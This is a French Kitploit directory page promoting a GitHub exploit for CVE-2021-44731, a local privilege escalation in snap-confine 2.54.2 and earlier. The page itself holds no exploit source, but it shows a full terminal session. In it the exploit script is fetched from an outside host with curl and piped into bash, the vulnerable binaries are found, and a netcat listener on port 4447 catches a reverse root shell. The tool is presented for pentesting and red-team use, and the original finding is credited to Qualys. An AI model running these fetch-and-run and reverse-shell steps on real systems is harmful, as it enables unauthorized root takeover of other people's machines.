Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-44731-snap-confine-SUID — Exploit d'élévation de privilèges locale pour CVE-2021-44731 ciblant les versions 2.54.2 et inférieures de snap-confine. Détecte automatiquement les binaires vulnérables et fournit un shell root via netcat. | Kitploit
Outils/GitHubGitHub/deeexcee-io/cve-2021-44731-snap-confine-suid
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationPost-ExploitationTests d'IntrusionRed Teaming
GitHubdeeexcee-io/cve-2021-44731-snap-confine-suid

CVE-2021-44731-snap-confine-SUID

Exploit d'élévation de privilèges locale pour CVE-2021-44731 ciblant les versions 2.54.2 et inférieures de snap-confine. Détecte automatiquement les binaires vulnérables et fournit un shell root via netcat.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
421il y a 3 ansPas encore vérifié

CVE-2021-44731-snap-confine-SUID

Exploit d'élévation de privilèges locaux pour CVE-2021-44731, snap-confine 2.54.2 et versions antérieures

Tout le crédit revient à Qualys pour avoir trouvé cette vulnérabilité et fourni un exploit détaillé.

https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt

Exploit rapide et basique de snap-confine LPE. Recherche une version vulnérable de snap-confine, si trouvée, l'exploite ensuite.

Renvoie un shell root, à attraper avec netcat

root@kitploit:~
$id
uid=1001(vulnchain) gid=1001(vulnchain) groups=1001(vulnchain)
$ curl http://10.8.0.134/snap_confine_LPE.sh | bash
curl http://10.8.0.134/snap_confine_LPE.sh | bash
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2073  100  2073    0     0  28397      0 --:--:-- --:--:-- --:--:-- 28013
Non-vulnerable version found: 2.54.3
Vulnerable version found: 2.44.3 at /usr/lib/snapd/snap-confine
Vulnerable version found: 2.44.3 at /home/vulnchain/snap-confine
Performing actions with a vulnerable version...
Chosen vulnerable version: 2.44.3

Shell root

root@kitploit:~
┌──(root㉿kali)-[~]
└─# nc -lvnp 4447    
listening on [any] 4447 ...
connect to [10.8.0.134] from (UNKNOWN) [10.10.111.136] 56050
bash: cannot set terminal process group (609): Inappropriate ioctl for device
bash: no job control in this shell
root@ip-10-10-10-14:/# id
id
uid=0(root) gid=0(root) groups=0(root),1001(vulnchain)
root@ip-10-10-10-14:/# 
Télécharger l’outil